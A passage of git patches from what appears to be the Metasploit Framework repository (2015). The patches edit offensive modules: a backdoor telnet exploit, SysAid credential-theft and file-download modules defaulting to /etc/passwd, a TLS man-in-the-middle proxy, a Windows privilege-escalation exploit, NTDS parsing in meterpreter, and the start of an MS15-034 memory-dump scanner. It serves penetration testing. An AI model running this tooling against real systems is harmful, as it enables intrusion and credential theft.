       'Targets' =>
         [
           [ 'Automatic',        { } ]
@@ -40,6 +49,20 @@ class Metasploit3 < Msf::Exploit::Remote
       'DefaultTarget'    => 0
       ))
 
+    register_advanced_options(
+      [
+        OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
+        OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
+      ], self.class)
+
+  end
+
+  def tel_timeout
+    (datastore['TelnetTimeout'] || 10).to_i
+  end
+
+  def banner_timeout
+    (datastore['TelnetBannerTimeout'] || 25).to_i
   end
 
   def check
@@ -76,33 +99,28 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def handle_telnet(telnetport)
 
-    begin
-      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
 
-      if sock
-        print_good("#{peer} - Backdoor service spawned")
-        add_socket(sock)
-      else
-        fail_with(Failure::Unreachable, "#{peer} - Backdoor service not spawned")
-      end
-
-      print_status "Starting a Telnet session #{rhost}:#{telnetport}"
-      merge_me = {
-        'USERPASS_FILE' => nil,
-        'USER_FILE'     => nil,
-        'PASS_FILE'     => nil,
-        'USERNAME'      => nil,
-        'PASSWORD'      => nil
-      }
-      start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
-    rescue
-      fail_with(Failure::Unreachable, "#{peer} - Backdoor service not handled")
+    if sock
+      print_good("#{peer} - Backdoor service spawned")
+      add_socket(sock)
+    else
+      fail_with(Failure::Unreachable, "#{peer} - Backdoor service not spawned")
     end
-    return
+
+    print_status("#{peer} - Trying to establish a telnet session...")
+    prompt = negotiate_telnet(sock)
+    if prompt.nil?
+      sock.close
+      fail_with(Failure::Unknown, "#{peer} - Unable to establish a telnet session")
+    else
+      print_good("#{peer} - Telnet session successfully established...")
+    end
+
+    handler(sock)
   end
 
   def execute_command(cmd)
-
     begin
       res = send_request_cgi({
         'method'        => 'GET',
@@ -114,4 +132,21 @@ class Metasploit3 < Msf::Exploit::Remote
       fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
     end
   end
+
+  # Since there isn't user/password negotiation, just wait until the prompt is there
+  def negotiate_telnet(sock)
+    begin
+      Timeout.timeout(banner_timeout) do
+        while(true)
+          data = sock.get_once(-1, tel_timeout)
+          return nil if not data or data.length == 0
+          if data =~ /\x23\x20$/
+            return true
+          end
+        end
+      end
+    rescue ::Timeout::Error
+      return nil
+    end
+  end
 end

From cf8008ed38bc9c8230716735a325202e6e962164 Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Sat, 20 Jun 2015 16:52:13 +0100
Subject: [PATCH 0484/1013] Update sysaid_admin_acct.rb

---
 modules/auxiliary/admin/http/sysaid_admin_acct.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/modules/auxiliary/admin/http/sysaid_admin_acct.rb b/modules/auxiliary/admin/http/sysaid_admin_acct.rb
index 46958e7276..2b373dee5e 100644
--- a/modules/auxiliary/admin/http/sysaid_admin_acct.rb
+++ b/modules/auxiliary/admin/http/sysaid_admin_acct.rb
@@ -27,9 +27,8 @@ class Metasploit3 < Msf::Auxiliary
       'References' =>
         [
           [ 'CVE', '2015-2993' ],
-          [ 'OSVDB', 'TODO' ],
           [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
-          [ 'URL', 'TODO_FULLDISC_URL' ]
+          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ]
         ],
       'DisclosureDate' => 'Jun 3 2015'))
 

From 3181d76e631d89348f8d94e1d47796cd32f4b4ff Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Sat, 20 Jun 2015 16:53:33 +0100
Subject: [PATCH 0485/1013] Update sysaid_auth_file_upload.rb

---
 modules/exploits/multi/http/sysaid_auth_file_upload.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/modules/exploits/multi/http/sysaid_auth_file_upload.rb b/modules/exploits/multi/http/sysaid_auth_file_upload.rb
index 3f8868ba57..7424cdd581 100644
--- a/modules/exploits/multi/http/sysaid_auth_file_upload.rb
+++ b/modules/exploits/multi/http/sysaid_auth_file_upload.rb
@@ -31,9 +31,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'References'  =>
         [
           [ 'CVE', '2015-2994' ],
-          [ 'OSVDB', 'TODO' ],
           [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
-          [ 'URL', 'TODO_FULLDISC_URL' ]
+          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ]
         ],
       'DefaultOptions' => { 'WfsDelay' => 5 },
       'Privileged'  => false,

From 11aca8b27a10b56c8007f378382ce1bb3599a9c7 Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Sat, 20 Jun 2015 16:54:33 +0100
Subject: [PATCH 0486/1013] Update sysaid_file_download.rb

---
 modules/auxiliary/admin/http/sysaid_file_download.rb | 6 ++----
 1 file changed, 2 insertions(+), 4 deletions(-)

diff --git a/modules/auxiliary/admin/http/sysaid_file_download.rb b/modules/auxiliary/admin/http/sysaid_file_download.rb
index b331514831..a5ba1dc7b7 100644
--- a/modules/auxiliary/admin/http/sysaid_file_download.rb
+++ b/modules/auxiliary/admin/http/sysaid_file_download.rb
@@ -32,10 +32,8 @@ class Metasploit3 < Msf::Auxiliary
         [
           [ 'CVE', '2015-2996' ],
           [ 'CVE', '2015-2997' ],
-          [ 'OSVDB', 'TODO' ],
-          [ 'OSVDB', 'TODO' ],
           [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
-          [ 'URL', 'TODO_FULLDISC_URL' ]
+          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ]
         ],
       'DisclosureDate' => 'Jun 3 2015'))
 
@@ -43,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary
       [
         OptPort.new('RPORT', [true, 'The target port', 8080]),
         OptString.new('TARGETURI', [ true,  "SysAid path", '/sysaid']),
-        OptString.new('FILEPATH', [false, 'Path of the file to download (escape Windows paths with 4 back slashes)', '/etc/passwd']),
+        OptString.new('FILEPATH', [false, 'Path of the file to download (escape Windows paths with a back slash)', '/etc/passwd']),
       ], self.class)
   end
 

From 78c2f8a3a3897b827a3e06cab71e7d7c2f675598 Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Sat, 20 Jun 2015 16:57:34 +0100
Subject: [PATCH 0487/1013] Update sysaid_sql_creds.rb

---
 modules/auxiliary/admin/http/sysaid_sql_creds.rb | 4 +---
 1 file changed, 1 insertion(+), 3 deletions(-)

diff --git a/modules/auxiliary/admin/http/sysaid_sql_creds.rb b/modules/auxiliary/admin/http/sysaid_sql_creds.rb
index de1024a397..7f0fe947c0 100644
--- a/modules/auxiliary/admin/http/sysaid_sql_creds.rb
+++ b/modules/auxiliary/admin/http/sysaid_sql_creds.rb
@@ -30,10 +30,8 @@ class Metasploit3 < Msf::Auxiliary
         [
           [ 'CVE', '2015-2996' ],
           [ 'CVE', '2015-2998' ],
-          [ 'OSVDB', 'TODO' ],
-          [ 'OSVDB', 'TODO' ],
           [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
-          [ 'URL', 'TODO_FULLDISC_URL' ]
+          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ]
         ],
       'DisclosureDate' => 'Jun 3 2015'))
 

From 50a3a32bfdb5e9caa76ace1d9677fa27cbeefe2f Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Sat, 20 Jun 2015 16:58:42 +0100
Subject: [PATCH 0488/1013] Update sysaid_sql_creds.rb

---
 modules/auxiliary/admin/http/sysaid_sql_creds.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/modules/auxiliary/admin/http/sysaid_sql_creds.rb b/modules/auxiliary/admin/http/sysaid_sql_creds.rb
index 7f0fe947c0..ce617b5655 100644
--- a/modules/auxiliary/admin/http/sysaid_sql_creds.rb
+++ b/modules/auxiliary/admin/http/sysaid_sql_creds.rb
@@ -115,8 +115,7 @@ class Metasploit3 < Msf::Auxiliary
           return
         end
       end
-      print_error("#{peer} - Failed to obtain database credentials, response was:")
-      print_line(res.body.to_s)
+      print_error("#{peer} - Failed to obtain database credentials, response was: #{res.body}")
     else
       print_error("#{peer} - Failed to obtain database credentials.")
     end

From ea49fd2fdc7186aff61ad60febbb7170a35ebcb5 Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Sat, 20 Jun 2015 16:59:28 +0100
Subject: [PATCH 0489/1013] Update sysaid_rdslogs_fle_upload.rb

---
 modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
index ce3fa0d722..d38a7b1687 100644
--- a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
+++ b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
@@ -34,9 +34,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'References'  =>
         [
           [ 'CVE', '2015-2995' ],
-          [ 'OSVDB', 'TODO' ],
           [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
-          [ 'URL', 'FULLDISC_URL' ]
+          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ]
         ],
       'DefaultOptions' => { 'WfsDelay' => 30 },
       'Privileged'  => false,

From dabc7abae5e2d32ad895a32147f5ec90e0eb7e85 Mon Sep 17 00:00:00 2001
From: Ramon de C Valle <rcvalle@rcvalle.com>
Date: Sat, 20 Jun 2015 18:23:34 -0700
Subject: [PATCH 0490/1013] Change method names to lowercase

---
 modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
index 1f189ba8da..6c7ebfd47e 100644
--- a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
+++ b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
       ], self.class)
   end
 
-  def PRF(secret, label, seed)
+  def prf(secret, label, seed)
     if secret.empty?
       s1 = s2 = ''
     else
@@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
     result
   end
 
-  def PRF_SHA256(secret, label, seed)
+  def prf_sha256(secret, label, seed)
     hmac_hash = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), secret, label + seed)
     OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), secret, hmac_hash + label + seed)
   end
@@ -153,10 +153,10 @@ class Metasploit3 < Msf::Auxiliary
               # message in plaintext.
               if fragment =~ /^\x0e\x00\x00\x00/
                 if header[2, 1] == "\x03"
-                  verify_data = PRF_SHA256('', 'server finished', OpenSSL::Digest::SHA256.digest(handshake_messages))
+                  verify_data = prf_sha256('', 'server finished', OpenSSL::Digest::SHA256.digest(handshake_messages))
                   verify_data = verify_data[0, 12]
                 else
-                  verify_data = PRF('', 'server finished', OpenSSL::Digest::MD5.digest(handshake_messages) + OpenSSL::Digest::SHA1.digest(handshake_messages))
+                  verify_data = prf('', 'server finished', OpenSSL::Digest::MD5.digest(handshake_messages) + OpenSSL::Digest::SHA1.digest(handshake_messages))
                   verify_data = verify_data[0, 12]
                 end
 

From 01e87282a9e4dd9437d2b2b0a34abb53bf7c713a Mon Sep 17 00:00:00 2001
From: Ramon de C Valle <rcvalle@rcvalle.com>
Date: Sat, 20 Jun 2015 18:48:10 -0700
Subject: [PATCH 0491/1013] Use Msf::ThreadManager#spawn

---
 modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
index 6c7ebfd47e..0ad9da6b76 100644
--- a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
+++ b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
@@ -98,8 +98,10 @@ class Metasploit3 < Msf::Auxiliary
     proxy = TCPServer.new(local_host, local_port)
     print_status('Listening on %s:%d' % [proxy.addr[2], proxy.addr[1]])
 
+    thread_num = 0
+
     loop do
-      Thread.start(proxy.accept) do |client|
+      framework.threads.spawn("Thread #{thread_num += 1}", false, proxy.accept) do |client|
       #loop do
         finished_sent = false
         handshake_messages = ''

From 7f55f6631cbceebbddacd9b63e986c1d1e8dcee6 Mon Sep 17 00:00:00 2001
From: Ramon de C Valle <rcvalle@rcvalle.com>
Date: Sat, 20 Jun 2015 20:14:47 -0700
Subject: [PATCH 0492/1013] Remove the timeout option

---
 modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb | 13 ++-----------
 1 file changed, 2 insertions(+), 11 deletions(-)

diff --git a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
index 0ad9da6b76..5bbd2fb60a 100644
--- a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
+++ b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
@@ -56,8 +56,7 @@ class Metasploit3 < Msf::Auxiliary
         OptString.new('HOST', [ true, 'The server address', nil]),
         OptString.new('PORT', [ true, 'The server port', 443]),
         OptString.new('SRVHOST', [ true, 'The proxy address', '0.0.0.0']),
-        OptString.new('SRVPORT', [ true, 'The proxy port', 443]),
-        OptInt.new('TIMEOUT', [ true, 'The timeout, in seconds', 5])
+        OptString.new('SRVPORT', [ true, 'The proxy port', 443])
       ], self.class)
   end
 
@@ -93,7 +92,6 @@ class Metasploit3 < Msf::Auxiliary
     local_host = datastore['SRVHOST']
     local_port = datastore['SRVPORT']
     port = datastore['PORT']
-    timeout = datastore['TIMEOUT']
 
     proxy = TCPServer.new(local_host, local_port)
     print_status('Listening on %s:%d' % [proxy.addr[2], proxy.addr[1]])
@@ -120,14 +118,7 @@ class Metasploit3 < Msf::Auxiliary
 
         print_status('Connected to %s:%d' % [fake_host, fake_port])
 
-        server = Socket.new(Socket::AF_INET, Socket::SOCK_STREAM)
-
-        begin
-          server.connect_nonblock(Socket.pack_sockaddr_in(port, host))
-
-        rescue IO::WaitWritable
-          raise Errno::ETIMEDOUT if IO.select(nil, [server], nil, timeout).nil?
-        end
+        server = TCPSocket.new(host, port)
 
         print_status('Connected to %s:%d' % [host, port])
 

From efece12b40d8c8e34f7209d42eb0cb7a7eb698c4 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Sun, 21 Jun 2015 16:07:44 -0400
Subject: [PATCH 0493/1013] Minor clean ups for ruby strings and check method

---
 .../local/ms15_051_client_copy_image.rb       | 20 +++++++++----------
 1 file changed, 9 insertions(+), 11 deletions(-)

diff --git a/modules/exploits/windows/local/ms15_051_client_copy_image.rb b/modules/exploits/windows/local/ms15_051_client_copy_image.rb
index 02ce84169b..9a278c72ae 100644
--- a/modules/exploits/windows/local/ms15_051_client_copy_image.rb
+++ b/modules/exploits/windows/local/ms15_051_client_copy_image.rb
@@ -57,19 +57,17 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def check
-    os = sysinfo["OS"]
-
-    if os !~ /windows/i
+    if sysinfo['OS'] !~ /windows/i
       return Exploit::CheckCode::Unknown
     end
 
-    if sysinfo["Architecture"] =~ /(wow|x)64/i
+    if sysinfo['Architecture'] =~ /(wow|x)64/i
       arch = ARCH_X86_64
-    elsif sysinfo["Architecture"] =~ /x86/i
+    elsif sysinfo['Architecture'] =~ /x86/i
       arch = ARCH_X86
     end
 
-    file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
+    file_path = expand_path('%windir%') << '\\system32\\win32k.sys'
     major, minor, build, revision, branch = file_version(file_path)
     vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
 
@@ -83,15 +81,15 @@ class Metasploit3 < Msf::Exploit::Local
       fail_with(Failure::None, 'Session is already elevated')
     end
 
-    if check == Exploit::CheckCode::Safe
-      fail_with(Failure::NotVulnerable, "Exploit not available on this system.")
+    if check == Exploit::CheckCode::Safe || check == Exploit::CheckCode::Unknown
+      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
     end
 
-    if sysinfo["Architecture"] =~ /wow64/i
+    if sysinfo['Architecture'] =~ /wow64/i
       fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
-    elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86
+    elsif sysinfo['Architecture'] =~ /x64/ && target.arch.first == ARCH_X86
       fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
-    elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64
+    elsif sysinfo['Architecture'] =~ /x86/ && target.arch.first == ARCH_X86_64
       fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
     end
 

From d73a3a4a5f37f6c5e586b35df63fe23630009f95 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Sun, 21 Jun 2015 16:16:33 -0400
Subject: [PATCH 0494/1013] Dont call ExitProcess because it might kill the
 shell

---
 .../exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c     | 5 +----
 1 file changed, 1 insertion(+), 4 deletions(-)

diff --git a/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c b/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c
index 637ddf7cd2..21d7503069 100755
--- a/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c
+++ b/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c
@@ -424,12 +424,10 @@ void win32k_client_copy_image(LPVOID lpPayload)
 	RtlGetVersion(&osver);
 	
 	if (osver.dwBuildNumber > 7601) {
-		ExitProcess((UINT)-1);
 		return;
 	}
 
 	if (supIsProcess32bit(GetCurrentProcess())) {
-		ExitProcess((UINT)-2);
 		return;
 	}
 
@@ -444,7 +442,6 @@ void win32k_client_copy_image(LPVOID lpPayload)
 
 
 	if (g_PsLookupProcessByProcessIdPtr == NULL) {
-		ExitProcess((UINT)-3);
 		return;
 	}
 
@@ -496,7 +493,7 @@ void win32k_client_copy_image(LPVOID lpPayload)
 	if (class_atom)
 		UnregisterClass(MAKEINTATOM(class_atom), hinst);
 
-	ExitProcess(0);
+	return;
 }
 
 BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)

From 7bda1e494b96522feb3868c656e5743477d2bb8b Mon Sep 17 00:00:00 2001
From: Ramon de C Valle <rcvalle@rcvalle.com>
Date: Sun, 21 Jun 2015 13:02:13 -0700
Subject: [PATCH 0495/1013] Use Rex::Socket::Tcp

---
 .../server/jsse_skiptls_mitm_proxy.rb         | 25 +++++++++++++------
 1 file changed, 18 insertions(+), 7 deletions(-)

diff --git a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
index 5bbd2fb60a..b2e1f78e36 100644
--- a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
+++ b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
@@ -109,16 +109,27 @@ class Metasploit3 < Msf::Auxiliary
 
         print_status('Accepted connection from %s:%d' % [client.addr[2], client.addr[1]])
 
-        context = OpenSSL::SSL::SSLContext.new(:TLSv1_2)
-        context.verify_mode = OpenSSL::SSL::VERIFY_NONE
-
-        tcp_socket = TCPSocket.new(fake_host, fake_port)
-        fake_server = OpenSSL::SSL::SSLSocket.new(tcp_socket, context)
-        fake_server.connect
+        fake_server = Rex::Socket::Tcp.create(
+          'PeerHost' => fake_host,
+          'PeerPort' => fake_port,
+          'SSL'      => true,
+          'SSLVerifyMode' => 'NONE',
+          'Context'  =>
+            {
+              'Msf'        => framework,
+              'MsfExploit' => self
+            })
 
         print_status('Connected to %s:%d' % [fake_host, fake_port])
 
-        server = TCPSocket.new(host, port)
+        server = Rex::Socket::Tcp.create(
+          'PeerHost' => host,
+          'PeerPort' => port,
+          'Context'  =>
+            {
+              'Msf'        => framework,
+              'MsfExploit' => self
+            })
 
         print_status('Connected to %s:%d' % [host, port])
 

From 732192aeaf59e3bd554add22e1a7ab5b8ec4d08f Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Mon, 22 Jun 2015 09:04:08 -0500
Subject: [PATCH 0496/1013] move ntds from priv to extapi

---
 lib/metasploit/framework/ntds/parser.rb       |  6 +--
 .../meterpreter/extensions/extapi/extapi.rb   |  2 +
 .../extensions/extapi/ntds/ntds.rb            | 39 +++++++++++++++++++
 .../post/meterpreter/extensions/extapi/tlv.rb |  3 ++
 .../post/meterpreter/extensions/priv/priv.rb  | 11 ------
 .../post/meterpreter/extensions/priv/tlv.rb   |  3 --
 6 files changed, 47 insertions(+), 17 deletions(-)
 create mode 100644 lib/rex/post/meterpreter/extensions/extapi/ntds/ntds.rb

diff --git a/lib/metasploit/framework/ntds/parser.rb b/lib/metasploit/framework/ntds/parser.rb
index ac7a8c0274..7c4d91890c 100644
--- a/lib/metasploit/framework/ntds/parser.rb
+++ b/lib/metasploit/framework/ntds/parser.rb
@@ -19,7 +19,7 @@ module Metasploit
         def initialize(client, file_path='')
           raise ArgumentError, "Invalid Filepath" unless file_path.present?
           @file_path = file_path
-          @channel = client.priv.ntds_parse(file_path)
+          @channel = client.extapi.ntds.parse(file_path)
           @client = client
         end
 
@@ -61,10 +61,10 @@ module Metasploit
         end
 
         def reopen_channel
-          @channel = client.priv.ntds_parse(file_path)
+          @channel = client.extapi.ntds.parse(file_path)
         end
 
       end
     end
   end
-end
\ No newline at end of file
+end
diff --git a/lib/rex/post/meterpreter/extensions/extapi/extapi.rb b/lib/rex/post/meterpreter/extensions/extapi/extapi.rb
index 31a3cd45af..ecc0852d9a 100644
--- a/lib/rex/post/meterpreter/extensions/extapi/extapi.rb
+++ b/lib/rex/post/meterpreter/extensions/extapi/extapi.rb
@@ -5,6 +5,7 @@ require 'rex/post/meterpreter/extensions/extapi/window/window'
 require 'rex/post/meterpreter/extensions/extapi/service/service'
 require 'rex/post/meterpreter/extensions/extapi/clipboard/clipboard'
 require 'rex/post/meterpreter/extensions/extapi/adsi/adsi'
+require 'rex/post/meterpreter/extensions/extapi/ntds/ntds'
 require 'rex/post/meterpreter/extensions/extapi/wmi/wmi'
 
 module Rex
@@ -34,6 +35,7 @@ class Extapi < Extension
               'service'   => Rex::Post::Meterpreter::Extensions::Extapi::Service::Service.new(client),
               'clipboard' => Rex::Post::Meterpreter::Extensions::Extapi::Clipboard::Clipboard.new(client),
               'adsi'      => Rex::Post::Meterpreter::Extensions::Extapi::Adsi::Adsi.new(client),
+              'ntds'      => Rex::Post::Meterpreter::Extensions::Extapi::Ntds::Ntds.new(client),
               'wmi'       => Rex::Post::Meterpreter::Extensions::Extapi::Wmi::Wmi.new(client)
             })
         },
diff --git a/lib/rex/post/meterpreter/extensions/extapi/ntds/ntds.rb b/lib/rex/post/meterpreter/extensions/extapi/ntds/ntds.rb
new file mode 100644
index 0000000000..8900434fd7
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/extapi/ntds/ntds.rb
@@ -0,0 +1,39 @@
+# -*- coding: binary -*-
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Extapi
+module Ntds
+
+###
+#
+# This meterpreter extension contains extended API functions for
+# parsing the NT Directory Service database.
+#
+###
+class Ntds
+
+  def initialize(client)
+    @client = client
+  end
+
+  def parse(filepath)
+    request = Packet.create_request('extapi_ntds_parse')
+    request.add_tlv( TLV_TYPE_NTDS_PATH, filepath)
+    # wait up to 90 seconds for a response
+    response = client.send_request(request, 90)
+    channel_id = response.get_tlv_value(TLV_TYPE_CHANNEL_ID)
+    if channel_id.nil?
+      raise Exception, "We did not get a channel back!"
+    end
+    Rex::Post::Meterpreter::Channels::Pool.new(client, channel_id, "extapi_ntds", CHANNEL_FLAG_SYNCHRONOUS)
+  end
+
+  attr_accessor :client
+
+end
+
+end; end; end; end; end; end
+
diff --git a/lib/rex/post/meterpreter/extensions/extapi/tlv.rb b/lib/rex/post/meterpreter/extensions/extapi/tlv.rb
index 0a96954776..99a7cf3a85 100644
--- a/lib/rex/post/meterpreter/extensions/extapi/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/extapi/tlv.rb
@@ -72,6 +72,9 @@ TLV_TYPE_EXT_ADSI_PATH_PATH                 = TLV_META_TYPE_STRING | (TLV_TYPE_E
 TLV_TYPE_EXT_ADSI_PATH_TYPE                 = TLV_META_TYPE_UINT   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 69)
 TLV_TYPE_EXT_ADSI_DN                        = TLV_META_TYPE_GROUP  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 70)
 
+TLV_TYPE_NTDS_TEST                          = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 80)
+TLV_TYPE_NTDS_PATH                          = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 81)
+
 TLV_TYPE_EXT_WMI_DOMAIN                     = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 90)
 TLV_TYPE_EXT_WMI_QUERY                      = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 91)
 TLV_TYPE_EXT_WMI_FIELD                      = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 92)
diff --git a/lib/rex/post/meterpreter/extensions/priv/priv.rb b/lib/rex/post/meterpreter/extensions/priv/priv.rb
index 12bed0d606..96a2e4fc6f 100644
--- a/lib/rex/post/meterpreter/extensions/priv/priv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb
@@ -95,17 +95,6 @@ class Priv < Extension
     }
   end
 
-  def ntds_parse(filepath)
-    request = Packet.create_request( 'priv_ntds_parse' )
-    request.add_tlv( TLV_TYPE_NTDS_PATH, filepath)
-    response = client.send_request( request, 90 )
-    channel_id = response.get_tlv_value(TLV_TYPE_CHANNEL_ID)
-    if channel_id.nil?
-      raise Exception, "We did not get a channel back!"
-    end
-    Rex::Post::Meterpreter::Channels::Pool.new(client, channel_id, "priv_ntds", CHANNEL_FLAG_SYNCHRONOUS)
-  end
-
   #
   # Modifying privileged file system attributes.
   #
diff --git a/lib/rex/post/meterpreter/extensions/priv/tlv.rb b/lib/rex/post/meterpreter/extensions/priv/tlv.rb
index 37fbc50bc5..92cf1b7f4a 100644
--- a/lib/rex/post/meterpreter/extensions/priv/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/tlv.rb
@@ -22,9 +22,6 @@ TLV_TYPE_ELEVATE_SERVICE_NAME       = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2
 TLV_TYPE_ELEVATE_SERVICE_DLL        = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 202)
 TLV_TYPE_ELEVATE_SERVICE_LENGTH     = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 203)
 
-#NTDS
-TLV_TYPE_NTDS_PATH                  = TLV_META_TYPE_STRING | (TLV_EXTENSIONS +   301)
-
 end
 end
 end

From 774aef7241ab4b905a445a7e075cbff2e672f610 Mon Sep 17 00:00:00 2001
From: rwhitcroft <rw81junk@gmail.com>
Date: Mon, 22 Jun 2015 10:31:31 -0400
Subject: [PATCH 0497/1013] add module to dump memory via MS15-034

---
 .../http/ms15034_http_sys_memory_dump.rb      | 186 ++++++++++++++++++
 1 file changed, 186 insertions(+)
 create mode 100644 modules/auxiliary/scanner/http/ms15034_http_sys_memory_dump.rb

diff --git a/modules/auxiliary/scanner/http/ms15034_http_sys_memory_dump.rb b/modules/auxiliary/scanner/http/ms15034_http_sys_memory_dump.rb
new file mode 100644
index 0000000000..9c3b84dd10
--- /dev/null
+++ b/modules/auxiliary/scanner/http/ms15034_http_sys_memory_dump.rb
@@ -0,0 +1,186 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/proto/http'
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+
+  def initialize
+    super(
+      'Name'        => 'MS15-034 HTTP.SYS Memory Dump',
+      'Description' => %q{
+        Dumps memory contents using a crafted Range header.
+        Reportedly affects Win7 and up, tested against Win8.1 and
+        Server 2012R2 with no crashes.  Note that if the target is
+        running in VMware Workstation, this module has a high likelihood
+        of resulting in BSOD. However, VMware ESX and non-virtualized
+        hosts seem stable.  Using a larger target file should result
+        in more memory being dumped, and SSL seems to produce more data
+        as well.
